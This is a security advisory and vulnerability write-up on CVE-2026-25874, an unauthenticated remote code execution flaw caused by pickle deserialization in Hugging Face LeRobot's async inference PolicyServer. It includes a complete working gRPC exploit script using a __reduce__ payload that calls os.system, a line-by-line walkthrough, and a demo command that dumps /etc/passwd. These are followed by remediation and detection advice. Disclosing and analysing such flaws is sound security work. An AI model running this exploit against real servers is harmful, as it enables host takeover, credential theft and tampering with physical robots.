CVE-2026-25874: Hugging Face LeRobot Unauthenticated RCE via Pickle Deserialization

Vulnerability Assessment and Penetration Testing (VAPT)

Summary

A critical remote code execution (RCE) vulnerability affects LeRobot, Hugging Face’s open-source robotics platform, specifically the async inference PolicyServer component. The issue stems from insecure deserialization of untrusted data using Python’s pickle module over exposed gRPC endpoints.

An unauthenticated attacker who can reach the PolicyServer network port can send a malicious serialized payload and execute arbitrary OS commands on the host machine running the service.

This is particularly dangerous because LeRobot is designed for GPU-backed inference systems, which often run with elevated privileges, access to robotics hardware, internal networks, datasets, and expensive compute resources.

What is LeRobot?



LeRobot is Hugging Face’s platform for real-world robotics and machine learning. It helps developers train and deploy robot policies using AI models.

Its async inference design separates robot control from heavy model inference:

- RobotClient runs on the robot device

- PolicyServer runs on a GPU machine

- The robot sends observations (camera frames / sensor data)

- The server returns actions (movement commands)

This architecture improves performance, but it also creates a network-exposed service that must securely process remote input.

LeRobot Workflow

The diagram illustrates a distributed robotics system in which the robot handles sensing and movement while a remote GPU server handles AI decision-making. Offloading inference lets the robot run on lighter, cheaper hardware, and lets the policy model scale independently on the server.

1. Real World / Robot Side

On the left side of the diagram is the robot client (robot_client.py), which runs directly on the robot.

Sensors Collect Information

The robot gathers data using:

- Cameras

- LiDAR

- IMU / motion sensors

- Other onboard sensors

These inputs help the robot understand its surroundings.

Observation Creation

The collected sensor data is converted into an observation, such as:

- Images

- Depth information

- Position data

- Proprioception (robot joint states)

This observation represents the robot’s current state.

2. Sending Data to the Server

The robot sends the observation to the remote GPU server through gRPC.

According to the diagram:

- Data is packaged into an Observation Message

- Transferred over the network

- Used for remote AI inference

This allows the robot to use powerful compute hardware without carrying a GPU onboard.

3. GPU Server / Policy Server

On the right side is the Policy Server (policy_server.py).

gRPC Service Receives Requests

The server exposes methods such as:

- SendObservations()

- SendPolicyInstructions()

These receive data from the robot.

AI Model Inference

Inside the server:

- Observation data is processed

- The trained AI policy model runs on GPU

- The model decides the next robot action

Examples:

- Move arm

- Rotate base

- Close gripper

- Change speed

4. Returning Actions

After inference, the server sends back an Action Message to the robot.

This contains movement commands such as:

- Joint positions

- Velocities

- Gripper state

- Base movement

5. Robot Executes Commands

The robot control system receives the returned action and activates:

- Motors

- Actuators

- Wheels

- Robotic arm joints

The robot then physically performs the task.
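The five steps above can be sketched as a single control loop. This is a minimal in-process illustration rather than LeRobot's API: the `Observation` and `Action` dataclasses, the `toy_policy` function, and all field names are hypothetical, and the gRPC hop is replaced by a direct function call.

```python
from dataclasses import dataclass


@dataclass
class Observation:
    """Hypothetical observation: one joint angle plus the desired angle."""
    joint_position: float
    target_position: float


@dataclass
class Action:
    """Hypothetical action: the joint position to move to next."""
    joint_position: float


def toy_policy(obs: Observation, max_step: float = 0.1) -> Action:
    """Stand-in for GPU inference: step toward the target, at most max_step."""
    error = obs.target_position - obs.joint_position
    step = max(-max_step, min(max_step, error))
    return Action(joint_position=obs.joint_position + step)


def control_loop(start: float, target: float, ticks: int) -> float:
    """Robot side: observe, ask the 'server' for an action, execute it."""
    position = start
    for _ in range(ticks):
        obs = Observation(joint_position=position, target_position=target)
        action = toy_policy(obs)  # in the real system this is a network call
        position = action.joint_position  # the actuator applies the command
    return position


final_position = control_loop(start=0.0, target=0.25, ticks=5)
```

The point of the sketch is the trust boundary: everything passed into the policy function crosses the network in the real deployment, so the server must treat it as untrusted input.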

Why Is It Important?

1. Makes Robotics Easier

Traditional robotics often requires:

- Mechanical engineering

- Control systems expertise

- Custom hardware code

- Complex middleware

LeRobot simplifies this with ML-style workflows familiar to AI developers.

2. Connects AI + Real Robots

Many AI models stay in simulation. LeRobot helps move models into:

- Real robot arms

- Mobile robots

- Cameras + sensors

- Physical tasks

That bridge is extremely valuable.

3. Open Source Ecosystem

It helps researchers and startups avoid building everything from scratch.

Includes:

- Training pipelines

- Dataset tools

- Inference servers

- Policy deployment tools

- Integration workflows

4. Hugging Face Robotics Vision

Just like Hugging Face helped standardize NLP models, LeRobot aims to help standardize robotics AI.

What Is CVE-2026-25874?

CVE-2026-25874 is the identifier assigned to a critical security vulnerability affecting Hugging Face LeRobot, specifically the async inference PolicyServer component.

The flaw allows unauthenticated remote code execution (RCE) through unsafe deserialization of attacker-controlled data using Python’s pickle module over exposed gRPC endpoints.

In practical terms, a remote attacker who can reach the vulnerable service may be able to execute arbitrary operating system commands on the host machine running the PolicyServer.

Affected Versions

Confirmed Vulnerable

- LeRobot v0.4.3 — Successfully validated in a real-world test environment using the official PyPI release with the default async inference PolicyServer component enabled.

Likely Affected

- Earlier LeRobot releases that include the same lerobot.async_inference.policy_server architecture and continue to deserialize untrusted gRPC input using Python pickle.loads().

- Any version where the vulnerable RPC handlers remain present, including:

  - SendPolicyInstructions()

  - SendObservations()

Technical Root Cause

The vulnerability stems from the unsafe deserialization of attacker-controlled network input within LeRobot’s async inference PolicyServer.

The service accepts raw bytes from remote gRPC clients and passes them directly into Python’s deserialization routine:

```python
pickle.loads(...)
```

This creates a critical security issue because Python’s pickle format is not designed for untrusted data. Unlike passive formats such as JSON or protobuf, pickle can reconstruct arbitrary Python objects and execute logic during the loading process.

An attacker can craft a malicious serialized object that abuses built-in object restoration mechanisms such as:

- __reduce__()

- __reduce_ex__()

- __setstate__()

Through these hooks, the serialized stream can name a callable such as os.system() or subprocess.Popen() together with attacker-chosen arguments, and the unpickler invokes that callable during deserialization itself.

As a result, code execution can occur before any application-level validation, type checks, or exception handling takes place.
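The mechanism can be observed safely with a benign callable. The sketch below is illustrative only: the class name `LooksHarmless` is hypothetical, and the builtin `int` stands in for whatever callable a hostile stream would name.

```python
import pickle


class LooksHarmless:
    """A class whose pickled form names a callable to run at load time."""

    def __reduce__(self):
        # Tell pickle: "to rebuild me, call int('42')".
        # A benign builtin stands in for an attacker-chosen callable.
        return (int, ("42",))


data = pickle.dumps(LooksHarmless())

# The loader calls int("42") itself. The receiving side needs no
# LooksHarmless code, and the result is not a LooksHarmless instance.
restored = pickle.loads(data)
print(type(restored).__name__, restored)
```

The byte stream, not the receiving application, decides which callable runs and with which arguments. That is why pickle cannot be made safe by inspecting the object after loading.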

Vulnerable RPC Handlers

The LeRobot PolicyServer exposes two gRPC RPC handlers that directly deserialize data received from the network using Python’s pickle.loads().

That is the core security flaw.

1. SendPolicyInstructions()

```python
def SendPolicyInstructions(self, request, context):
    policy_specs = pickle.loads(request.data)  # nosec
    if not isinstance(policy_specs, RemotePolicyConfig):
        raise TypeError(...)
```

What Happens

- Client connects to gRPC server

- Sends raw bytes inside request.data

- Server immediately runs:

```python
pickle.loads(request.data)
```

- Only after deserialization does it check:

```python
isinstance(policy_specs, RemotePolicyConfig)
```

Why This Is Dangerous

With Python pickle, malicious code can run during pickle.loads().

That means the type check happens too late.

Even if the object is invalid and raises an exception, the attack payload may already have executed.

2. SendObservations()

```python
def SendObservations(self, request_iterator, context):
    received_bytes = receive_bytes_in_chunks(...)
    timed_observation = pickle.loads(received_bytes)  # nosec
```

What Happens

- Attacker streams bytes to the server

- Server rebuilds full payload

- Runs:

```python
pickle.loads(received_bytes)
```

Again, arbitrary code can execute immediately.
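The "rebuild the full payload" step can be sketched as follows. This is a hypothetical stand-in, not LeRobot's receive_bytes_in_chunks(): the function name `reassemble`, the `max_bytes` parameter, and the exception type are assumptions made for illustration.

```python
from typing import Iterable


class PayloadTooLarge(ValueError):
    """Raised when a streamed payload exceeds the configured limit."""


def reassemble(chunks: Iterable[bytes], max_bytes: int) -> bytes:
    """Join streamed chunks, refusing to buffer more than max_bytes."""
    buffer = bytearray()
    for chunk in chunks:
        if len(buffer) + len(chunk) > max_bytes:
            raise PayloadTooLarge(f"payload exceeds {max_bytes} bytes")
        buffer.extend(chunk)
    return bytes(buffer)


payload = reassemble([b"abc", b"def"], max_bytes=16)
```

A size cap of this kind bounds memory use for streamed input, but it does nothing about the deserialization problem: a hostile pickle can be very small.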

Why # nosec Matters

The comment:

```python
# nosec
```

is commonly used to suppress findings from static security scanners such as Bandit.

Bandit normally flags this pattern under:

```
B301: pickle usage is insecure
```

The annotation suggests that the risk of pickle.loads() had been flagged, and that the warning was suppressed rather than the underlying call being replaced.

Why Type Validation Does Not Help

Many developers think this is safe:

```python
obj = pickle.loads(data)

if not isinstance(obj, SafeType):
    raise TypeError()
```

It is not safe because pickle reconstructs objects first.

During reconstruction, special methods like:

```python
__reduce__()
__setstate__()
```

can execute commands before isinstance() is reached.
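The ordering problem can be demonstrated with a harmless side effect. In this sketch, `ExpectedConfig`, `Marker`, and `load_checked` are hypothetical names, and the builtin `print` stands in for an attacker's callable; the output is captured so the example can report what happened.

```python
import contextlib
import io
import pickle


class ExpectedConfig:
    """Stand-in for the type the handler expects (hypothetical)."""


class Marker:
    def __reduce__(self):
        # Benign stand-in for an attacker's callable: just print a line.
        return (print, ("callable ran inside pickle.loads",))


def load_checked(data: bytes) -> ExpectedConfig:
    """Same shape as the handler: deserialize first, validate second."""
    obj = pickle.loads(data)  # the callable named in the stream runs here
    if not isinstance(obj, ExpectedConfig):
        raise TypeError("unexpected type")  # too late: it already ran
    return obj


captured = io.StringIO()
rejected = False
with contextlib.redirect_stdout(captured):
    try:
        load_checked(pickle.dumps(Marker()))
    except TypeError:
        rejected = True

side_effect_happened = "callable ran" in captured.getvalue()
print(f"rejected={rejected}, side_effect_happened={side_effect_happened}")
```

The request is rejected with a TypeError, yet the side effect has already occurred. Validation after pickle.loads() can only decide what to do with the result, not whether the stream's callable runs.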

Exploit Script Analysis

The following Python script demonstrates how the LeRobot PolicyServer vulnerability can be exploited by sending a malicious pickle payload to the exposed gRPC service. The script abuses insecure deserialization in the vulnerable RPC handlers to achieve remote code execution.

```python
import os
import pickle
import grpc
import argparse

from transport import services_pb2, services_pb2_grpc

parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True, help="Target host:port")
parser.add_argument("--method", default="both", choices=["policy", "obs", "both"])
parser.add_argument("--cmd", default="ls > /tmp/lerobot_pwned")
args = parser.parse_args()


class RCE:
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


print(f"[*] Target: {args.target}")
print(f"[*] Command: {args.cmd}")

channel = grpc.insecure_channel(args.target)
stub = services_pb2_grpc.AsyncInferenceStub(channel)

# Initialize server
try:
    print("[*] Calling Ready() to initialize server...")
    stub.Ready(services_pb2.Empty())
    print("[+] Server is ready")
except grpc.RpcError as e:
    print(f"[!] Ready() failed: {e.code()}")
    exit(1)

payload = pickle.dumps(RCE(args.cmd))

# Method 1: SendPolicyInstructions
if args.method in ["policy", "both"]:
    try:
        print("[*] Sending malicious pickle via SendPolicyInstructions...")
        print(f"[*] Payload size: {len(payload)} bytes")
        stub.SendPolicyInstructions(
            services_pb2.PolicySetup(data=payload)
        )
    except grpc.RpcError as e:
        print(f"[+] RPC error (expected - RCE already executed): {e.code()}")

# Method 2: SendObservations
if args.method in ["obs", "both"]:
    try:
        print("[*] Sending malicious pickle via SendObservations...")

        def gen():
            yield services_pb2.Observation(
                transfer_state=0,
                data=payload)

        stub.SendObservations(gen())
    except grpc.RpcError as e:
        print(f"[+] RPC error (expected - RCE already executed): {e.code()}")

print("[*] Done")
```

1. Import Required Modules

```python
import os
import pickle
import grpc
import argparse

from transport import services_pb2, services_pb2_grpc
```

The script imports modules for:

- os → used to run system commands

- pickle → creates the malicious serialized payload

- grpc → communicates with the LeRobot server

- argparse → handles user-supplied command-line options

- services_pb2 / services_pb2_grpc → generated protobuf stubs for the target gRPC API

2. Accept User Arguments

```python
parser.add_argument("--target", required=True)
parser.add_argument("--method", default="both")
parser.add_argument("--cmd", default="ls > /tmp/lerobot_pwned")
```

The exploit accepts:

- --target → target IP and port

- --method → choose vulnerable endpoint (policy, obs, or both)

- --cmd → operating system command to run on the target

3. Malicious Payload Class

```python
class RCE:
    def __reduce__(self):
        return (os.system, (self.cmd,))
```

This is the core of the exploit.

The special Python method __reduce__() tells pickle how to reconstruct the object. Instead of rebuilding harmless data, it instructs Python to call:

```python
os.system(command)
```

When the server deserializes the object, the supplied command runs automatically.
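What __reduce__() places in the byte stream can be inspected without loading it, using the standard-library pickletools module. The sketch below uses a benign callable (`len`); the `Demo` class and `opcode_names` helper are hypothetical names introduced for illustration.

```python
import pickle
import pickletools


class Demo:
    def __reduce__(self):
        # Benign stand-in: ask the loader to call len("abc").
        return (len, ("abc",))


def opcode_names(data: bytes) -> list[str]:
    """List the opcode names in a pickle stream without loading it."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)]


names = opcode_names(pickle.dumps(Demo()))

# The stream references a global callable and then applies it via REDUCE.
calls_a_global = "REDUCE" in names and (
    "STACK_GLOBAL" in names or "GLOBAL" in names
)

# Plain data (a dict of strings, ints, and lists) needs no REDUCE opcode.
plain_names = opcode_names(pickle.dumps({"joint": [1, 2, 3]}))
```

This is a way to see the mechanism, not a filter to rely on: legitimate pickles of class instances also reference globals, so opcode inspection alone cannot separate safe streams from hostile ones.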

4. Connect to the Vulnerable Server

```python
channel = grpc.insecure_channel(args.target)
stub = services_pb2_grpc.AsyncInferenceStub(channel)
```

The script connects to the exposed PolicyServer over insecure gRPC.

This mirrors the server configuration and requires no TLS or authentication.

5. Call Ready() First

```python
stub.Ready(services_pb2.Empty())
```

This initializes the service and confirms the server is reachable before sending the payload.

6. Build Malicious Pickle Bytes

```python
payload = pickle.dumps(RCE(args.cmd))
```

The exploit converts the malicious object into serialized bytes suitable for network transmission.

7. Exploit Method #1 — SendPolicyInstructions

```python
stub.SendPolicyInstructions(
    services_pb2.PolicySetup(data=payload)
)
```

The payload is inserted into the PolicySetup.data bytes field and sent to the first vulnerable endpoint.

When the server runs:

```python
pickle.loads(request.data)
```

the command executes.

8. Exploit Method #2 — SendObservations

```python
stub.SendObservations(gen())
```

The same malicious bytes are streamed through the second vulnerable endpoint using the Observation.data field.

This targets:

```python
pickle.loads(received_bytes)
```

on the server.





Real-World Test Environment

The vulnerability was validated against the official LeRobot v0.4.3 package installed directly from PyPI with no source code modifications. Testing was performed using the default async inference PolicyServer component in a standard environment.

```shell
pip install lerobot
```

Start the Vulnerable PolicyServer

```shell
python3 -m lerobot.async_inference.policy_server --host=0.0.0.0 --port=50051
```

This command launches LeRobot’s async inference PolicyServer, which is the remote gRPC service responsible for:

- Receiving robot observations

- Running AI policy inference

- Returning movement actions to robot clients

A malicious client was then executed against the exposed server:

```shell
python3 ex1.py --target 127.0.0.1:50051 --method both --cmd "cat /etc/passwd > /tmp/x"
```

This runs a custom exploit script that sends a malicious pickle payload to the vulnerable server.

--method both → Uses both vulnerable RPC endpoints:

- SendPolicyInstructions()

- SendObservations()

The exploit successfully triggered unsafe deserialization through the vulnerable RPC handlers, resulting in command execution on the target host. The contents of /etc/passwd were written to /tmp/x, confirming arbitrary OS command execution.



How the attack works

1. Craft Malicious Payload

The attacker creates a specially crafted Python pickle object that contains a hidden system command.

This object abuses Python serialization features such as __reduce__() so the command runs automatically when deserialized.

2. Send Payload via gRPC

The malicious serialized bytes are sent to the vulnerable LeRobot PolicyServer using exposed gRPC endpoints such as SendPolicyInstructions() or SendObservations().

Because the service uses insecure gRPC transport, no authentication or encrypted connection is required.

3. Unsafe Deserialization

After receiving the request, the server processes the attacker-controlled bytes using pickle.loads().

Unlike safe formats such as JSON, pickle can reconstruct Python objects and execute embedded instructions during loading.

4. Remote Code Execution

During deserialization, the hidden payload triggers the supplied operating system command automatically.

This gives the attacker the ability to run arbitrary commands with the same privileges as the LeRobot service.

5. Result Written on Target

The output of the executed command is written to a local file on the compromised machine.

In the demonstration, the contents of /etc/passwd were redirected into /tmp/x, confirming successful exploitation.

6. Full System Compromise Potential

Once command execution is achieved, the attacker can steal credentials, install malware, or create persistence.

They may also move laterally through the internal network or tamper with robot operations.

Impact of the Vulnerability

1. Unauthenticated Remote Code Execution

An attacker with network access can run arbitrary commands on affected LeRobot systems.

No login, user interaction, or prior privileges are required.

2. Full Server Compromise

The PolicyServer host can be fully taken over after successful exploitation.

Attackers may access files, install malware, or maintain persistence.

3. Client / Robot Compromise

Connected robot clients may also be impacted through the same insecure channel.

This can expose onboard systems, local storage, and control processes.

4. Theft of Sensitive Data

Attackers may steal API keys, SSH credentials, model files, and internal data.

Captured secrets can be reused for deeper network compromise.

5. Internal Network Pivoting

Once inside, attackers can move laterally to other trusted systems.

GPU servers and robotics environments often sit in privileged networks.

6. Service Disruption and Sabotage

Attackers can crash services, corrupt models, or stop robot operations.

This may interrupt research, automation, or production workflows.

7. Physical Safety Risk

If tied to real robots, malicious commands could cause unsafe movement.

This creates operational and safety concerns in real-world environments.

Recommended Remediation

1. Remove Pickle from Network Input

Replace pickle.loads() with safe formats like JSON, protobuf, or safetensors.

Pickle should never be used on attacker-controlled data because it can execute code.
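One way to apply this is to accept a data-only format and validate every field explicitly. The sketch below uses JSON from the standard library. The `PolicyRequest` fields, the device allowlist, and the function name are hypothetical and do not reflect LeRobot's actual RemotePolicyConfig.

```python
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class PolicyRequest:
    """Hypothetical, illustrative fields; not LeRobot's RemotePolicyConfig."""
    policy_type: str
    device: str
    actions_per_chunk: int


ALLOWED_DEVICES = {"cpu", "cuda"}  # assumed allowlist for the example


def parse_policy_request(raw: bytes) -> PolicyRequest:
    """Parse untrusted bytes as JSON and validate every field explicitly."""
    doc = json.loads(raw.decode("utf-8"))
    if not isinstance(doc, dict):
        raise ValueError("expected a JSON object")
    expected = {"policy_type", "device", "actions_per_chunk"}
    if set(doc) != expected:
        raise ValueError(f"expected exactly the keys {sorted(expected)}")
    if not isinstance(doc["policy_type"], str):
        raise ValueError("policy_type must be a string")
    device = doc["device"]
    if not isinstance(device, str) or device not in ALLOWED_DEVICES:
        raise ValueError("device is not in the allowlist")
    count = doc["actions_per_chunk"]
    # bool is a subclass of int, so exclude it explicitly.
    if not isinstance(count, int) or isinstance(count, bool) or count <= 0:
        raise ValueError("actions_per_chunk must be a positive integer")
    return PolicyRequest(doc["policy_type"], device, count)


request = parse_policy_request(
    b'{"policy_type": "act", "device": "cuda", "actions_per_chunk": 50}'
)
```

Unlike pickle, a JSON parser only produces dicts, lists, strings, numbers, booleans, and None, so nothing in the input can name a callable. Large tensors such as camera frames would need a separate binary encoding, for example protobuf bytes fields or safetensors.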

2. Enable TLS Encryption

Replace add_insecure_port() with add_secure_port() using certificates.

TLS protects traffic from interception and verifies server identity.

3. Add Authentication

Require API tokens, mTLS, or JWT validation for all gRPC clients.

Only trusted robots and internal systems should access the PolicyServer.
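A token check could look roughly like the sketch below. It assumes the client sends an `authorization: Bearer <token>` metadata entry, which is a convention chosen for this example. In grpcio, a servicer can read request metadata with `context.invocation_metadata()` and reject a call with `context.abort(grpc.StatusCode.UNAUTHENTICATED, ...)`; the helper itself uses only the standard library so it can be tested in isolation.

```python
import hmac
from typing import Iterable, Tuple


def is_authorized(metadata: Iterable[Tuple[str, str]], expected_token: str) -> bool:
    """Return True only if metadata carries 'authorization: Bearer <token>'."""
    for key, value in metadata:
        if key.lower() != "authorization":
            continue
        scheme, _, presented = value.partition(" ")
        if scheme != "Bearer":
            return False
        # compare_digest avoids leaking how many leading bytes matched.
        return hmac.compare_digest(presented.encode(), expected_token.encode())
    return False


ok = is_authorized([("authorization", "Bearer s3cret")], "s3cret")
```

The check must run before any request body is deserialized, and a shared token is only meaningful over TLS, since otherwise it can be read off the wire.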

4. Restrict Network Access

Block public exposure and allow only trusted IPs or private networks.

Use firewalls, VPNs, or segmented internal infrastructure.
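Where a firewall rule is not available, an application-level allowlist can serve as an additional layer. The sketch below assumes the peer's IP address has already been extracted as a string; the networks listed are placeholders, not recommendations.

```python
import ipaddress

# Hypothetical allowlist: loopback plus one private lab subnet.
ALLOWED_NETWORKS = [
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("10.20.0.0/24"),
]


def is_allowed(peer_ip: str) -> bool:
    """Return True if peer_ip parses and falls inside an allowed network."""
    try:
        address = ipaddress.ip_address(peer_ip)
    except ValueError:
        return False
    return any(address in network for network in ALLOWED_NETWORKS)


lab_robot_allowed = is_allowed("10.20.0.7")
```

Binding the server to 127.0.0.1 or a private interface instead of 0.0.0.0, as in the --host flag shown earlier, reduces exposure before any such check is reached.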

5. Disable Async Components if Unused

Temporarily disable PolicyServer or remote inference if not required.

Running local inference is safer until an official patch is available.

6. Harden the Host System

Run the service as a non-root user inside a restricted container.

Use AppArmor, SELinux, and least-privilege controls to limit damage.

7. Monitor for Exploitation

Watch for suspicious child processes, reverse shells, or files in /tmp/.

Alert on Python spawning bash, curl, nc, or unusual outbound traffic.
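A detection rule of this kind can be sketched as a filter over process-creation events. The `ProcessEvent` record and the list of suspicious child names are assumptions for illustration; real events would come from an audit or EDR source. Note that os.system() runs its command through the system shell on POSIX hosts, so a Python parent with an sh child is the expected trace of the payload described above.

```python
from typing import Iterable, List, NamedTuple


class ProcessEvent(NamedTuple):
    """Hypothetical record from a process-monitoring source."""
    parent_name: str
    child_name: str
    child_cmdline: str


# Assumed watchlist: shells and common download / network tools.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "nc", "ncat"}


def flag_suspicious(events: Iterable[ProcessEvent]) -> List[ProcessEvent]:
    """Return events where a Python process spawned a shell or network tool."""
    return [
        event
        for event in events
        if event.parent_name.startswith("python")
        and event.child_name in SUSPICIOUS_CHILDREN
    ]


sample = [
    ProcessEvent("python3", "sh", "sh -c cat /etc/passwd > /tmp/x"),
    ProcessEvent("python3", "nvidia-smi", "nvidia-smi"),
    ProcessEvent("sshd", "bash", "-bash"),
]
alerts = flag_suspicious(sample)
```

Legitimate tooling may also spawn shells from Python, so a rule like this is a starting point for triage rather than a verdict.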

Conclusion

The LeRobot PolicyServer vulnerability highlights a common but critical security mistake: using unsafe deserialization on network-facing services. By calling pickle.loads() on unauthenticated gRPC input, the application effectively allows remote users to execute arbitrary code on affected systems.

Because LeRobot is designed for GPU-backed robotics environments, successful exploitation can lead to full server compromise, theft of sensitive credentials, disruption of robotic operations, and potential safety risks where physical hardware is involved. The lack of authentication and encrypted transport further increases the severity of the issue.

This case serves as an important reminder that convenience-driven design choices in machine learning infrastructure can introduce serious security weaknesses. Serialization formats intended for trusted local use should never be exposed directly to remote clients.